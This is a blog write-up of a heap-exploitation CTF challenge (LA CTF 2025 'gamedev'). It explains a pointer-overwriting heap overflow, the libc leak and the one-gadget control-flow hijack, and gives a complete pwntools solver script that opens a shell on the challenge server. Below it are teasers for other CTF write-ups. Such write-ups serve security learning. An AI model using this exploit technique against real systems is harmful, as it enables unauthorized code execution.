[PWN] LA CTF 2025 - gamedev heap challenge

-

   ( بِسْمِ اللَّـهِ الرَّحْمَـٰنِ الرَّحِيمِ )

(إن أحسنت فمن الله، وإن أسأت فمن نفسي والشيطان)


Hey guys,

now we have a challenge from LA CTF 2025 it was an easy but hard -I made a mistake :(-, let's start.

Reverse (code review)

in the reverse process, we can notice the following

  • the binary uses a struct called "Level"
  • there is a heap overflow.
  • no free in the challenge
  • custom list (next-ptr) is used




functions in the binary

  • "init" creates a chunk to store the next addresses and this is the "start" variable
  • "explore" function is used to move from level to level.
  • "create" creates a new chunk with size "0x60"
  • "test" to read from the chunk
  • "edit" modify the chunk "vulnerable to overflow"
  • "reset" is used to reset the "curr" pointer which points to the currently used level. "remember this"






what I got from using the binary

  • to point to a level you have to create a level after it
  • the "create" function adds the pointer of new levels "curr->next[idx] = level;" in the current level's next
  • we have to 
    • leak the libc
    • control the RIP (with one gadget)


Exploit

my mistake was that I used the "reset" function each time I created or used any function and this was wrong because the function set "curr = start" and the start chunk we can not control.

the idea is:

  • create some levels 3 levels [2,3,4]
  • use "explore(3)" to point to level "3" chunk
  • create level [0] and the address of it will stored in level 3's next
  • point to level 2 using "explore(2)"
  • use "edit" to write into the current level which is 2
  • with overflow in the edit function, we can modify the next pointer which is stored in level 3

now with these steps, we can control the next pointer so we can have arbitrary read & write when we add an address to the next variable it is considered as a level so we can read(leak libc) or write(on address) on it.

let's take a look at the memory, the red chunk is "start" and we can not control it, the blue chunk is the level with index "2", and the green chunk is the level "3" which is corrupted from us.


something to add the index is pointing to the place in the space of "next" from 0 to 7.

when we point to the corrupted level with our address it will be stored in the first place of the next list of level 3 so the index will be "0".




and if we contain all of these parts together we will get the shell ;-).


the "solver" script (there is an issue with GitHub I can not upload the challenge files).

#!/usr/bin/env python3
from pwn import *

# Set up pwntools for the correct architecture
exe = context.binary = ELF(args.EXE or './chall')
libc = ELF(exe.libc.path)

host = args.HOST or 'chall.lac.tf'
port = int(args.PORT or 31338)


def start_local(argv=[], *a, **kw):
'''Execute the target binary locally'''
if args.GDB:
return gdb.debug([exe.path] + argv, aslr=False, gdbscript=gdbscript, *a, **kw)
else:
return process([exe.path] + argv, *a, **kw)

def start_remote(argv=[], *a, **kw):
'''Connect to the process on the remote host'''
io = connect(host, port)
if args.GDB:
gdb.attach(io, gdbscript=gdbscript)
return io

def start(argv=[], *a, **kw):
'''Start the exploit against the target.'''
if args.LOCAL:
return start_local(argv, *a, **kw)
else:
return start_remote(argv, *a, **kw)

gdbscript = '''
# b malloc
#mallocs
# b *create_level+117
# ??
# b *create_level+248
# b *test_level+149
#fgets
# b *edit_level+149

#curr->next[idx]
# b *explore+99
continue
'''.format(**locals())

def create(idx):
io.sendlineafter(b"Choice: ", b"1")
io.sendlineafter(b"index: ", str(idx).encode())

def edit(cont):
io.sendlineafter(b"Choice: ", b"2")
io.sendlineafter(b"data: ", (cont))

def read(): # test
io.sendlineafter(b"Choice: ", b"3")

def explore(idx): # maybe used to jump to other chunk
io.sendlineafter(b"Choice: ", b"4")
io.sendlineafter(b"index: ", str(idx).encode())

def reset():
io.sendlineafter(b"Choice: ", b"5")

context.terminal = "tmux splitw -h".split()
# context.log_level = "debug"
io = start()

io.recvuntil(b"gift: ")
main_addr = int(io.recvline()[:-1], 16)

print(f"[+] leaked main addr @ {hex(main_addr)}")

# size 0x60
# 0x5555555592a0
# 0x55555555b310
create(2) #
create(3) #
create(4) # 0x5555555593f0

explore(3) # this contain the next ptr

create(0) # 0x555555559460 = Overwrite this one

addr2leak = main_addr + ((0x2960)) # libc leak

print(f"[+] addr to leak @ {hex(addr2leak)}")

raw_input("GDB 0")

# leak the libc
reset()
explore(2)
pay = b"A" * (8*6)
pay += p64( addr2leak ) # address to control (libc)
edit( pay )

reset()
explore(3)
explore(0) # now curr = controlled-address
read()

io.recvuntil(b"data: ")
l = io.recvline()
libc_leak = u64(l[6:12].ljust(8, b"\x00"))
libc.address = libc_leak - 0x77980

print(f"[+] libc leak @ {hex(libc_leak)}")
print(f"[+] libc.address @ {hex(libc.address)}")

raw_input("GDB 1")

# control exit GOT
addr2leak = main_addr + ((0x29de)-0x40) # control flow

reset()
explore(2)
pay = b"B" * (8*6)
pay += p64( addr2leak ) # address to control (libc)
edit( pay )

reset()
explore(3)
explore(0) # now curr = controlled-address
pay = p64(libc.address + 0xd511f)
edit( pay )

io.sendline(b"6")

io.interactive()

the output of one gadget


Thank you for reading, the challenge and solver in my GitHub (will be isA).

Update: all challenges are here.



عن أبي هريرة رضي الله عنه أن رسول الله صلى الله عليه وسلم قال: (قال الله عزوجل: كل عمل بن آدم له إلا الصيام؛ فإنه لي وأنا أجزي به، والصيام جنّة، وإذا كان يوم صوم أحدكم فلا يرفث، ولا يصخب، فإن سابّه أحد أو قاتله فليقل: إني امرؤ صائم، والذي نفس محمد بيده لخلوف فم الصائم أطيب عند الله من ريح المسك، للصائم فرحتان يفرحهما: إذا أفطر فرح، وإذا لقي ربه فرح بصومه) رواه البخاري ومسلم.
.

Comments

Post a Comment

Popular posts from this blog

[BlackHatMEA-CTF 2024] cockatoo PWN challenge

-
Image
 ( بِسْمِ اللَّـهِ الرَّحْمَـٰنِ الرَّحِيمِ ) (إن أحسنت فمن الله، وإن أسأت فمن نفسي والشيطان) Let's check the "cockatoo" pwn challenge from Blackhat MEA CTF 2024. Reverse the Binary we note that the binary takes the input byte by byte and there is a counter (i hate static analysts) Dynamic analysis  Let's jump to GDB and see what happened. I set a breakpoint on the road to get the stack address in which our input will be stored, and the following screenshots show our input increase and the counter before the RIP address. and the payload to overwrite the counter and control where the next write will be in the following screenshots  and we added to the counter (16) and could overwrite the RIP now we have to find our gadgets and do a simple execve, right?!!! NOOOOOO Exploit we don't have gadgets for "rdx, rdi, rsi" and we need to do "execve(rdi, rsi, rdx)", but we have "syscall" and "pop rax" so its time for our SROP attack. we...
Read more

[WEB] ASC Wargame CTF 2024 - Challenge Hot Proxy

-
Image
 ( بِسْمِ اللَّـهِ الرَّحْمَـٰنِ الرَّحِيمِ ) (إن أحسنت فمن الله، وإن أسأت فمن نفسي والشيطان) It was a nice CTF, I got 2nd place with my guys: Hissien Misbah ( Twitter ) Mohamed Bebo ( Linkedin ) Sameh ( Linkedin ) Osama Zidan ( Linkedin ) A picture during solving this challenge in the last 5m of the CTF (thinking that we got 1st place). Let's walk through the Web Challenge Hot Proxy, note that we did not solve it during the time of the CTF it was a minute way, let's start. Note: there is no source code in the challenge attachment, I requested it from the author ( @serWazito0 ) thanks to him, challenges files ( ASCWG_2024_CTF ). Note: the flag file in the server and called "flag_<RANDOM>.txt", so we have to get RCE. From the title I know that there is an "SSRF" vulnerability in this challenge and from the description, we know that there is an internal application called "app1" with a route called "/secret" so our target is to access...
Read more

Lets Analysis STM32F103 Chip Firmware from Attify

-
Image
( بِسْمِ اللَّـهِ الرَّحْمَـٰنِ الرَّحِيمِ ) Let's start our blog. As we know any IoT device should have a firmware to run it and there is a thought that it is secure by default because it is in a board, but we know that we can dump this firmware, our firmware know is already shared with us something like training to learn basics of reversing firmware. you can download the firmware from here . if we run the file command on the firmware we will find this "STM32F103C-firmware.bin: data" and if we try to get the architecture using binwalk it will return empty result "binwalk -A STM32F103C-firmware.bin" but we don't need this because it is a famous chip and we can know what we want from google. After searching for the chip name STM32F103C we will open its default page you will know that it run using "ARM Cortex M3" we will need that later, it is time to analysis using Ghidra. Analysis Dropping the firmware file to Ghidra but it will not detect anything...
Read more